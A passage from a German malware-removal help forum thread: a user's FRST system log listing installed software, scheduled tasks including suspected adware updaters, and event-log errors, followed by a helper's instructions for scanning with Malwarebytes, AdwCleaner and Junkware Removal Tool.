Microsoft SQL Server VSS Writer (Version: 10.1.2531.0)
Microsoft Visual C++ 2005 Redistributable (x32 Version: 8.0.56336)
Microsoft Visual C++ 2005 Redistributable (x32 Version: 8.0.61001)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (Version: 9.0.30729)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (Version: 9.0.30729.6161)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (x32 Version: 9.0.30729)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (x32 Version: 9.0.30729.6161)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (Version: 10.0.40219)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (x32 Version: 10.0.40219)
Microsoft Visual C++ 2010 Express - DEU (x32 Version: 10.0.30319)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.51106 (x32 Version: 11.0.51106.1)
Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.51106 (x32 Version: 11.0.51106)
Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.51106 (x32 Version: 11.0.51106)
Microsoft Visual Studio 2010 Express Prerequisites x64 - DEU (Version: 10.0.30319)
Microsoft XNA Framework Redistributable 3.1 (x32 Version: 3.1.10527.0)
Microsoft-Maus- und Tastatur-Center (Version: 2.1.177.0)
MixPad Audiodatei-Mixer (x32)
Mozilla Firefox 12.0 (x86 de) (x32 Version: 12.0)
Mozilla Maintenance Service (x32 Version: 12.0)
MSVCRT (x32 Version: 15.4.2862.0708)
MSVCRT_amd64 (x32 Version: 15.4.2862.0708)
MSXML 4.0 SP3 Parser (KB2721691) (x32 Version: 4.30.2114.0)
MSXML 4.0 SP3 Parser (KB2758694) (x32 Version: 4.30.2117.0)
MSXML 4.0 SP3 Parser (x32 Version: 4.30.2100.0)
myMugle (x32 Version: 3.0.0.0)
NCH Tone Generator (x32)
nder (Version: 2.63-release)
Need For Speed™ World (x32 Version: 1.0.0.1398)
NetBeans IDE 7.3 (Version: 7.3)
Norton Identity Safe (x32 Version: 2013.4.0.10)
Notepad++ (x32 Version: 6.1.2)
NVIDIA 3D Vision Driver 285.64 (Version: 285.64)
NVIDIA Control Panel 285.64 (Version: 285.64)
NVIDIA Graphics Driver 285.64 (Version: 285.64)
NVIDIA Install Application (Version: 2.1002.46.235)
NVIDIA Optimus 1.5.20 (Version: 1.5.20)
NVIDIA PhysX (x32 Version: 9.10.0513)
NVIDIA Stereoscopic 3D Driver (x32 Version: 7.17.12.8564)
NVIDIA Update Components (Version: 1.5.20)
OpenAL (x32)
Oracle VM VirtualBox 4.2.16 (Version: 4.2.16)
Paint.NET v3.5.10 (Version: 3.60.0)
PCSUITE SHREDDER (x32)
PCSX2 - Playstation 2 Emulator (x32)
phase-6 2.3.2b (x32 Version: 2.3.2b)
PhotoStage Slideshow Producer (x32)
Picasa 3 (x32 Version: 3.9)
PlayReady PC Runtime amd64 (Version: 1.3.0)
Pošta Windows Live (x32 Version: 15.4.3502.0922)
Project 64 version 2.1.0.1 (x32 Version: 2.1.0.1)
Raccolta foto di Windows Live (x32 Version: 15.4.3502.0922)
Realtek High Definition Audio Driver (x32 Version: 6.0.1.6449)
Realtek USB 2.0 Reader Driver (x32 Version: 6.1.7600.10010)
Remote Control Input Device Registry Key (x32 Version: 1.1.0.0.081231)
Resource Hacker Version 3.6.0 (x32)
Revo Uninstaller 1.95 (x32 Version: 1.95)
Scratch (x32 Version: 1.4.0.0)
Secret Maryo Chronicles (x32 Version: 1.9)
Service Pack 1 für SQL Server 2008 (KB 968369) (64-bit) (Version: 10.1.2531.0)
sfArk (x32)
Skype™ 6.6 (x32 Version: 6.6.106)
Speccy (Version: 1.21)
Spelling Dictionaries Support For Adobe Reader X (x32 Version: 10.0.0)
Spybot - Search & Destroy (x32 Version: 2.1.19)
Sql Server Customer Experience Improvement Program (Version: 10.1.2531.0)
Stella 3.6 (x32)
Synaptics Pointing Device Driver (Version: 16.3.15.1)
System Explorer 4.2.2 (x32)
TeamSpeak 3 Client (Version: 3.0.10.1)
TeamViewer 8 (x32 Version: 8.0.18930)
Techne (HKCU Version: 1.3.0.15)
Text-To-Speech-Runtime (x32 Version: 1.0.0.0)
TI USB 3.0 Host Controller Driver (x32 Version: 1.12.16)
TI USB3 Host Driver (x32 Version: 1.12.16)
TuneUp Utilities 2013 (x32 Version: 13.0.3020.2)
TuneUp Utilities Language Pack (de-DE) (x32 Version: 13.0.3020.2)
Ubisoft Game Launcher (x32 Version: 1.0.0.0)
Unlocker 1.9.2 (Version: 1.9.2)
Unterstützungsdateien für Microsoft SQL Server 2008-Setup  (Version: 10.1.2731.0)
Update for Microsoft .NET Framework 4.5 (KB2750147) (x32 Version: 1)
Update for Microsoft .NET Framework 4.5 (KB2805221) (x32 Version: 1)
Update for Microsoft .NET Framework 4.5 (KB2805226) (x32 Version: 1)
Update for Microsoft Office 2010 (KB2553065)
Update for Microsoft Office 2010 (KB2553092)
Update for Microsoft Office 2010 (KB2553181) 64-Bit Edition
Update for Microsoft Office 2010 (KB2553267) 64-Bit Edition
Update for Microsoft Office 2010 (KB2553270) 64-Bit Edition
Update for Microsoft Office 2010 (KB2553310) 64-Bit Edition
Update for Microsoft Office 2010 (KB2553378) 64-Bit Edition
Update for Microsoft Office 2010 (KB2566458)
Update for Microsoft Office 2010 (KB2598242) 64-Bit Edition
Update for Microsoft Office 2010 (KB2687509) 64-Bit Edition
Update for Microsoft Office 2010 (KB2760631) 64-Bit Edition
Update for Microsoft Office 2010 (KB2767886) 64-Bit Edition
Update for Microsoft OneNote 2010 (KB2553290) 64-Bit Edition
Update for Microsoft Outlook 2010 (KB2597090) 64-Bit Edition
Update for Microsoft Outlook 2010 (KB2687623) 64-Bit Edition
Update for Microsoft Outlook Social Connector 2010 (KB2553406) 64-Bit Edition
Update for Microsoft PowerPoint 2010 (KB2598240) 64-Bit Edition
Update for Microsoft SharePoint Workspace 2010 (KB2589371) 64-Bit Edition
Usenet.nl (HKCU)
VideoPad Videobearbeitungs-Software (x32)
VirtualDJ Home FREE (x32 Version: 7.4)
Vita 2 (Version: 1.0.0.0)
Vita 2 Zusatzcontent (Version: 1.0.0.0)
Vita Bass Machine (Version: 1.0.0.0)
Vita Rock Drums (Version: 1.0.0.0)
Vita String Ensemble (Version: 1.0.0.0)
Vita World Percussion (Version: 1.0.0.0)
VLC media player 1.1.11 (x32 Version: 1.1.11)
watchmi (x32 Version: 3.0.0)
WBFS Manager 2.5 (Version: 2.5)
Web Assistant 2.0.0.601 (Version: 2.0.0.601)
Windows Live (x32 Version: 15.4.3502.0922)
Windows Live Communications Platform (x32 Version: 15.4.3502.0922)
Windows Live Essentials (x32 Version: 15.4.3502.0922)
Windows Live Essentials (x32 Version: 15.4.3538.0513)
Windows Live Fotogalerie (x32 Version: 15.4.3502.0922)
Windows Live Fotótár (x32 Version: 15.4.3502.0922)
Windows Live ID Sign-in Assistant (Version: 7.250.4232.0)
Windows Live Installer (x32 Version: 15.4.3502.0922)
Windows Live Language Selector (Version: 15.4.3538.0513)
Windows Live Mail (x32 Version: 15.4.3502.0922)
Windows Live Mesh (x32 Version: 15.4.3502.0922)
Windows Live Mesh ActiveX control for remote connections (x32 Version: 15.4.5722.2)
Windows Live Mesh ActiveX Control for Remote Connections (x32 Version: 15.4.5722.2)
Windows Live Mesh ActiveX-objekt til fjernforbindelser (x32 Version: 15.4.5722.2)
Windows Live Mesh ActiveX-vezérlő távoli kapcsolatokhoz (x32 Version: 15.4.5722.2)
Windows Live MIME IFilter (Version: 15.4.3502.0922)
Windows Live Movie Maker (x32 Version: 15.4.3502.0922)
Windows Live Photo Common (x32 Version: 15.4.3502.0922)
Windows Live Photo Gallery (x32 Version: 15.4.3502.0922)
Windows Live PIMT Platform (x32 Version: 15.4.3508.1109)
Windows Live Remote Client (Version: 15.4.5722.2)
Windows Live Remote Client Resources (Version: 15.4.5722.2)
Windows Live Remote Service (Version: 15.4.5722.2)
Windows Live Remote Service Resources (Version: 15.4.5722.2)
Windows Live SOXE (x32 Version: 15.4.3502.0922)
Windows Live SOXE Definitions (x32 Version: 15.4.3502.0922)
Windows Live UX Platform (x32 Version: 15.4.3502.0922)
Windows Live UX Platform Language Pack (x32 Version: 15.4.3508.1109)
Windows Live Writer (x32 Version: 15.4.3502.0922)
Windows Live Writer Resources (x32 Version: 15.4.3502.0922)
Windows Media Center Add-in for Silverlight (x32 Version: 4.7.3.0)
Windows Movie Maker 2.6 (x32 Version: 2.6.4037.0)
Windows Speech Recognition Macros (x32 Version: 1.0.6862.19)
Wireshark 1.8.7 (64-bit) (x32 Version: 1.8.7)
WxDFast Updater (x32)
YTD Video Downloader 4.3 (x32 Version: 4.3)

==================== Restore Points  =========================

31-07-2013 11:17:53 Removed Java 7 Update 21 (64-bit)
31-07-2013 11:20:02 Removed Java(TM) 6 Update 29 (64-bit)
31-07-2013 11:21:58 Removed Java 7 Update 21 (64-bit)
31-07-2013 11:22:57 Removed Java 7 Update 25
31-07-2013 11:30:39 Installed Java 7 Update 25 (64-bit)
31-07-2013 11:41:42 Installed Java 7 Update 25
05-08-2013 14:29:59 Revo Uninstaller's restore point - BlueStacks Notification Center
05-08-2013 14:30:41 Removed BlueStacks Notification Center
05-08-2013 15:55:49 Installed Oracle VM VirtualBox 4.2.16
13-08-2013 08:23:03 Windows Update
15-08-2013 12:11:05 Windows Update
18-08-2013 12:00:21 Windows Update
18-08-2013 16:27:04 Windows Update

==================== Hosts content: ==========================

2013-06-04 14:19 - 2013-07-23 12:42 - 00000860 ____N C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

Task: {0B14BE5B-8051-4D1B-849C-C9063E5C6B23} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe [2013-01-29] (Microsoft)
Task: {1C6504AA-6334-4D19-BD06-1DC1CAFCE201} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-01-29] (Microsoft Corporation)
Task: {1E2BECAF-002B-432E-B364-5ADDE31A4763} - System32\Tasks\NCH Software\photostageDowngrade => C:\Program Files (x86)\NCH Software\PhotoStage\photostage.exe [2012-07-26] (NCH Software)
Task: {2C003594-6A1A-4238-94BE-A3691163FB59} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search &amp; Destroy 2\SDUpdate.exe No File
Task: {2D27EB0B-CE5E-41CA-AB2E-36B499F9691E} - System32\Tasks\Java Update Scheduler => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2013-03-12] (Oracle Corporation)
Task: {4A644EE9-679C-446A-A8C5-F1F8D167EC77} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2012-01-19] (Google Inc.)
Task: {4D5E8568-8265-46A8-B87D-8D103D693EAD} - System32\Tasks\Microsoft_MKC_Logon_Task_ipoint.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-01-29] (Microsoft Corporation)
Task: {503DF0C1-7351-4DA0-AB0D-C1A6EAA65C2A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2012-01-19] (Google Inc.)
Task: {59332908-BD03-4DCB-9CDC-D204727BC4EE} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search &amp; Destroy 2\SDImmunize.exe No File
Task: {5F94CC2C-0FDE-4A14-A60A-5E75CC402C5D} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2013-02-25] (Piriform Ltd)
Task: {68E582A6-F721-49C7-A0DD-67EC04ED3890} - System32\Tasks\Norton AntiVirus\Norton Error Analyzer => C:\Program Files (x86)\Norton AntiVirus\Engine\20.4.0.40\SymErr.exe No File
Task: {74406E8B-47E0-4BEE-B466-635E1F7A8C89} - System32\Tasks\Norton Identity Safe\Norton Error Analyzer => C:\Program Files (x86)\Norton Identity Safe\Engine\2013.4.0.10\SymErr.exe [2013-05-30] (Symantec Corporation)
Task: {8227FF19-8280-414E-AFB5-1CDA9FE64907} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-01-29] (Microsoft Corporation)
Task: {87399361-6364-45B0-9EC4-B016B4EB0055} - System32\Tasks\Microsoft\Windows\WindowsBackup\Windows Backup Monitor => C:\Windows\system32\sdclt.exe [2010-11-21] (Microsoft Corporation)
Task: {8AE7D937-D7FD-4D5A-832D-FFCE81BC888A} - System32\Tasks\Microsoft_MKC_Logon_Task_itype.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-01-29] (Microsoft Corporation)
Task: {9A59CF05-CBA3-4B70-8A0E-5C97926A2E53} - System32\Tasks\NCH Software\ExpressZipDowngrade => C:\Program Files (x86)\NCH Software\ExpressZip\expresszip.exe [2012-12-14] (NCH Software)
Task: {A1E9C48F-3176-4584-B9F5-82A870ADBABF} - System32\Tasks\TuneUpUtilities_Task_BkGndMaintenance2013 => C:\Program Files (x86)\TuneUp Utilities 2013\OneClick.exe [2013-01-28] (TuneUp Software)
Task: {A501BB97-83C8-429A-8CEE-CEA2E7BE5F80} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe [2010-11-21] (Microsoft Corporation)
Task: {AB1592DB-30D3-496D-9476-740C810AD6CC} - System32\Tasks\Norton Identity Safe\Norton Error Processor => C:\Program Files (x86)\Norton Identity Safe\Engine\2013.4.0.10\SymErr.exe [2013-05-30] (Symantec Corporation)
Task: {C7492ED3-4F59-4726-9FA5-0FB45AFD22F0} - System32\Tasks\Norton AntiVirus\Norton Error Processor => C:\Program Files (x86)\Norton AntiVirus\Engine\20.4.0.40\SymErr.exe No File
Task: {CF8C8953-87C9-4CD0-B5BB-CE2E6662AB37} - System32\Tasks\Adobe-Online-Aktualisierungsprogramm => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2013-04-04] (Adobe Systems Incorporated)
Task: {CFA7A3EC-CAF1-4E66-B63B-01229B7C0A97} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search &amp; Destroy 2\SDScan.exe No File
Task: {D22931C0-23D3-4CA3-AEC5-FD70EC8D67F1} - System32\Tasks\Microsoft\Windows\WindowsBackup\AutomaticBackup => C:\Windows\system32\rundll32.exe [2009-07-14] (Microsoft Corporation)
Task: {E3543653-6F6B-4D28-81CF-841348EA9ED1} - System32\Tasks\WxDFastUpdaterTask{3C1BA1D8-EAAE-42BB-9BC9-85A27908B34F} => C:\ProgramData\WxDFast\WxDFast.exe No File
Task: {E689D74D-1932-4A12-AF3D-F7C596AD23D9} - System32\Tasks\YourFile Update => C:\Program Files (x86)\YourFileDownloader\YourFileUpdater.exe No File
Task: {E6BCF55C-3F61-4672-AFEB-903258FC147F} - System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan => c:\program files\windows defender\MpCmdRun.exe [2009-07-14] (Microsoft Corporation)
Task: {F23ACF37-FCA8-4D7A-BBCF-18554EE1C12F} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task
Task: {F7B42FDA-90A1-40F8-8012-6D4811E54D6C} - System32\Tasks\GBoxUpdaterTask{131876AC-419C-40EF-98DD-8C8C18A85D0B} => C:\ProgramData\GBox\GBox.exe No File
Task: {FA3D3901-5AFE-4409-9757-A7B8F8127B68} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton AntiVirus\Engine\20.4.0.40\WSCStub.exe No File
Task: {FA988ADE-7378-4BDB-A1C8-0111DB6DACFC} - System32\Tasks\{E2C4A3D5-A61A-4501-BFE4-1E11C2145C4D} => c:\program files (x86)\google\chrome\application\chrome.exe [2013-07-25] (Google Inc.)
Task: C:\Windows\Tasks\GBoxUpdaterTask{131876AC-419C-40EF-98DD-8C8C18A85D0B}.job => C:\ProgramData\GBox\GBox.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\WxDFastUpdaterTask{3C1BA1D8-EAAE-42BB-9BC9-85A27908B34F}.job => C:\ProgramData\WxDFast\WxDFast.exe

==================== Faulty Device Manager Devices =============

Name: VirtualBox Host-Only Ethernet Adapter
Description: VirtualBox Host-Only Ethernet Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Oracle Corporation
Service: VBoxNetAdp
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: Microsoft-Adapter für Miniports virtueller WiFis
Description: Microsoft-Adapter für Miniports virtueller WiFis
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: vwifimp
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Event log errors: =========================

Application errors:
==================
Error: (08/22/2013 11:19:23 AM) (Source: WinMgmt) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/22/2013 11:19:12 AM) (Source: BstHdAndroidSvc) (User: )
Description: Der Dienst kann nicht gestartet werden. System.ApplicationException: Cannot start service.  Service did not stop gracefully the last time it was run.
   bei BlueStacks.hyperDroid.Service.Service.OnStart(String[] args)
   bei System.ServiceProcess.ServiceBase.ServiceQueuedMainCallback(Object state)

Error: (08/21/2013 02:46:34 PM) (Source: Application Error) (User: )
Description: Name der fehlerhaften Anwendung: MpCmdRun.exe, Version: 6.1.7600.16385, Zeitstempel: 0x4a5bc8f9
Name des fehlerhaften Moduls: ntdll.dll, Version: 6.1.7601.18205, Zeitstempel: 0x51dba4e7
Ausnahmecode: 0xc0000005
Fehleroffset: 0x00000000000986ea
ID des fehlerhaften Prozesses: 0x17bc
Startzeit der fehlerhaften Anwendung: 0xMpCmdRun.exe0
Pfad der fehlerhaften Anwendung: MpCmdRun.exe1
Pfad des fehlerhaften Moduls: MpCmdRun.exe2
Berichtskennung: MpCmdRun.exe3

Error: (08/21/2013 01:31:06 PM) (Source: .NET Runtime Optimization Service) (User: )
Description: .NET Runtime Optimization Service (clr_optimization_v4.0.30319_64) - Failed to execute command from the offline queue: uninstall "System.Configuration, Version=2.0.0.0, Culture=Neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=msil" /NoDependencies .  The error returned was Error: The specified assembly is not installed.
.

Error: (08/21/2013 01:31:06 PM) (Source: .NET Runtime Optimization Service) (User: )
Description: .NET Runtime Optimization Service (clr_optimization_v4.0.30319_64) - Failed to execute command from the offline queue: uninstall "System.Data.SqlXml, Version=2.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil".  The error returned was Error: The specified assembly is not installed.
.

Error: (08/21/2013 01:29:51 PM) (Source: BstHdAndroidSvc) (User: )
Description: Der Dienst kann nicht gestartet werden. System.ApplicationException: Cannot start service.  Service did not stop gracefully the last time it was run.
   bei BlueStacks.hyperDroid.Service.Service.OnStart(String[] args)
   bei System.ServiceProcess.ServiceBase.ServiceQueuedMainCallback(Object state)

Error: (08/21/2013 01:29:49 PM) (Source: WinMgmt) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/18/2013 01:49:09 PM) (Source: WinMgmt) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/18/2013 01:48:49 PM) (Source: BstHdAndroidSvc) (User: )
Description: Der Dienst kann nicht gestartet werden. System.ApplicationException: Cannot start service.  Service did not stop gracefully the last time it was run.
   bei BlueStacks.hyperDroid.Service.Service.OnStart(String[] args)
   bei System.ServiceProcess.ServiceBase.ServiceQueuedMainCallback(Object state)

Error: (08/18/2013 01:48:11 PM) (Source: Avira Antivirus) (User: NT-AUTORITÄT)
Description: Während der Initialisierung der Suchengine trat ein unbekannter Fehler auf!
Fehlercode: 0x35


System errors:
=============
Error: (08/22/2013 11:19:12 AM) (Source: Service Control Manager) (User: )
Description: Der Dienst "BlueStacks Android Service" wurde mit folgendem Fehler beendet: 
%%1064

Error: (08/21/2013 01:30:51 PM) (Source: Service Control Manager) (User: )
Description: Der Dienst "Spybot-S&D 2 Scanner Service" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%1053

Error: (08/21/2013 01:30:51 PM) (Source: Service Control Manager) (User: )
Description: Das Zeitlimit (30000 ms) wurde beim Verbindungsversuch mit dem Dienst Spybot-S&D 2 Scanner Service erreicht.

Error: (08/21/2013 01:30:20 PM) (Source: Service Control Manager) (User: )
Description: Der Dienst "Spybot-S&D 2 Updating Service" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%1053

Error: (08/21/2013 01:30:20 PM) (Source: Service Control Manager) (User: )
Description: Das Zeitlimit (30000 ms) wurde beim Verbindungsversuch mit dem Dienst Spybot-S&D 2 Updating Service erreicht.

Error: (08/21/2013 01:29:51 PM) (Source: Service Control Manager) (User: )
Description: Der Dienst "BlueStacks Android Service" wurde mit folgendem Fehler beendet: 
%%1064

Error: (08/21/2013 01:29:48 PM) (Source: Service Control Manager) (User: )
Description: Der Dienst "Spybot-S&D 2 Scanner Service" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%1053

Error: (08/21/2013 01:29:48 PM) (Source: Service Control Manager) (User: )
Description: Das Zeitlimit (30000 ms) wurde beim Verbindungsversuch mit dem Dienst Spybot-S&D 2 Scanner Service erreicht.

Error: (08/18/2013 06:27:18 PM) (Source: DCOM) (User: )
Description: {995C996E-D918-4A8C-A302-45719A6F4EA7}

Error: (08/18/2013 01:48:49 PM) (Source: Service Control Manager) (User: )
Description: Der Dienst "BlueStacks Android Service" wurde mit folgendem Fehler beendet: 
%%1064


Microsoft Office Sessions:
=========================
Error: (08/22/2013 11:19:23 AM) (Source: WinMgmt)(User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/22/2013 11:19:12 AM) (Source: BstHdAndroidSvc)(User: )
Description: Der Dienst kann nicht gestartet werden. System.ApplicationException: Cannot start service.  Service did not stop gracefully the last time it was run.
   bei BlueStacks.hyperDroid.Service.Service.OnStart(String[] args)
   bei System.ServiceProcess.ServiceBase.ServiceQueuedMainCallback(Object state)

Error: (08/21/2013 02:46:34 PM) (Source: Application Error)(User: )
Description: MpCmdRun.exe6.1.7600.163854a5bc8f9ntdll.dll6.1.7601.1820551dba4e7c000000500000000000986ea17bc01ce9e6c76ee2d04c:\program files\windows defender\MpCmdRun.exeC:\Windows\SYSTEM32\ntdll.dllb585ee4e-0a5f-11e3-a4a1-ac7289be7f07

Error: (08/21/2013 01:31:06 PM) (Source: .NET Runtime Optimization Service)(User: )
Description: .NET Runtime Optimization Service (clr_optimization_v4.0.30319_64) - Failed to execute command from the offline queue: uninstall "System.Configuration, Version=2.0.0.0, Culture=Neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=msil" /NoDependencies .  The error returned was Error: The specified assembly is not installed.
.

Error: (08/21/2013 01:31:06 PM) (Source: .NET Runtime Optimization Service)(User: )
Description: .NET Runtime Optimization Service (clr_optimization_v4.0.30319_64) - Failed to execute command from the offline queue: uninstall "System.Data.SqlXml, Version=2.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil".  The error returned was Error: The specified assembly is not installed.
.

Error: (08/21/2013 01:29:51 PM) (Source: BstHdAndroidSvc)(User: )
Description: Der Dienst kann nicht gestartet werden. System.ApplicationException: Cannot start service.  Service did not stop gracefully the last time it was run.
   bei BlueStacks.hyperDroid.Service.Service.OnStart(String[] args)
   bei System.ServiceProcess.ServiceBase.ServiceQueuedMainCallback(Object state)

Error: (08/21/2013 01:29:49 PM) (Source: WinMgmt)(User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/18/2013 01:49:09 PM) (Source: WinMgmt)(User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/18/2013 01:48:49 PM) (Source: BstHdAndroidSvc)(User: )
Description: Der Dienst kann nicht gestartet werden. System.ApplicationException: Cannot start service.  Service did not stop gracefully the last time it was run.
   bei BlueStacks.hyperDroid.Service.Service.OnStart(String[] args)
   bei System.ServiceProcess.ServiceBase.ServiceQueuedMainCallback(Object state)

Error: (08/18/2013 01:48:11 PM) (Source: Avira Antivirus)(User: NT-AUTORITÄT)
Description: 0x35


==================== Memory info =========================== 

Percentage of memory in use: 60%
Total physical RAM: 4001.87 MB
Available physical RAM: 1579.84 MB
Total Pagefile: 8001.93 MB
Available Pagefile: 4374.12 MB
Total Virtual: 8192 MB
Available Virtual: 8191.82 MB

==================== Drives ================================

Drive c: (Boot) (Fixed) (Total:394.66 GB) (Free:106.02 GB) NTFS
Drive d: (Recover) (Fixed) (Total:70 GB) (Free:40.48 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 466 GB) (Disk ID: 0DA1342C)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=395 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=70 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=1 GB) - (Type=12)

==================== End Of Log ============================
         
--- --- ---


Hoffe das durcheinander mit meinen ganzen Programmen macht das ganze nicht zu schwer
__________________

Alt 22.08.2013, 12:11   #4
schrauber
/// the machine
/// TB-Ausbilder
 

WxDFast.exe und GBox.exe = Maleware? - Standard

WxDFast.exe und GBox.exe = Maleware?



Downloade Dir bitte Malwarebytes Anti-Malware
  • Installiere das Programm in den vorgegebenen Pfad. (Bebilderte Anleitung zu MBAM)
  • Starte Malwarebytes' Anti-Malware (MBAM).
  • Klicke im Anschluss auf Scannen, wähle den Bedrohungssuchlauf aus und klicke auf Suchlauf starten.
  • Lass am Ende des Suchlaufs alle Funde (falls vorhanden) in die Quarantäne verschieben. Klicke dazu auf Auswahl entfernen.
  • Lass deinen Rechner ggf. neu starten, um die Bereinigung abzuschließen.
  • Starte MBAM, klicke auf Verlauf und dann auf Anwendungsprotokolle.
  • Wähle das neueste Scan-Protokoll aus und klicke auf Export. Wähle Textdatei (.txt) aus und speichere die Datei als mbam.txt auf dem Desktop ab. Das Logfile von MBAM findest du hier.
  • Füge den Inhalt der mbam.txt mit deiner nächsten Antwort hinzu.


Downloade Dir bitte AdwCleaner Logo Icon AdwCleaner auf deinen Desktop.
  • Schließe alle offenen Programme und Browser. Bebilderte Anleitung zu AdwCleaner.
  • Starte die AdwCleaner.exe mit einem Doppelklick.
  • Stimme den Nutzungsbedingungen zu.
  • Klicke auf Optionen und vergewissere dich, dass die folgenden Punkte ausgewählt sind:
    • "Tracing" Schlüssel löschen
    • Winsock Einstellungen zurücksetzen
    • Proxy Einstellungen zurücksetzen
    • Internet Explorer Richtlinien zurücksetzen
    • Chrome Richtlinien zurücksetzen
    • Stelle sicher, dass alle 5 Optionen wie hier dargestellt, ausgewählt sind
  • Klicke auf Suchlauf und warte bis dieser abgeschlossen ist.
  • Klicke nun auf Löschen und bestätige auftretende Hinweise mit Ok.
  • Dein Rechner wird automatisch neu gestartet. Nach dem Neustart öffnet sich eine Textdatei. Poste mir deren Inhalt mit deiner nächsten Antwort.
  • Die Logdatei findest du auch unter C:\AdwCleaner\AdwCleaner[Cx].txt. (x = fortlaufende Nummer).

Beende bitte Deine Schutzsoftware um eventuelle Konflikte zu vermeiden.
Bitte lade Junkware Removal Tool auf Deinen Desktop

  • Starte das Tool mit Doppelklick. Ab Windows Vista (oder höher) bitte mit Rechtsklick "als Administrator ausführen" starten.
  • Drücke eine beliebige Taste, um das Tool zu starten.
  • Je nach System kann der Scan eine Weile dauern.
  • Wenn das Tool fertig ist wird das Logfile (JRT.txt) auf dem Desktop gespeichert und automatisch geöffnet.
  • Bitte poste den Inhalt der JRT.txt in Deiner nächsten Antwort.


und ein frisches FRST log bitte.
__________________
gruß,
schrauber

Proud Member of UNITE and ASAP since 2009

Spenden
Anleitungen und Hilfestellungen
Trojaner-Board Facebook-Seite

Keine Hilfestellung via PM!

Antwort

Themen zu WxDFast.exe und GBox.exe = Maleware?
alarm, benutzer, brauche, cookie, cpu, dateien, frage, gen, image, javascript, leeren, mac, maleware, min, ordner, problem, programme, proxy, prozess, prozesse, random, scan, system, taskmanager, update, virus?



Ähnliche Themen: WxDFast.exe und GBox.exe = Maleware?


  1. Skype?Maleware
    Log-Analyse und Auswertung - 16.09.2014 (3)
  2. Techbrwosing Maleware?
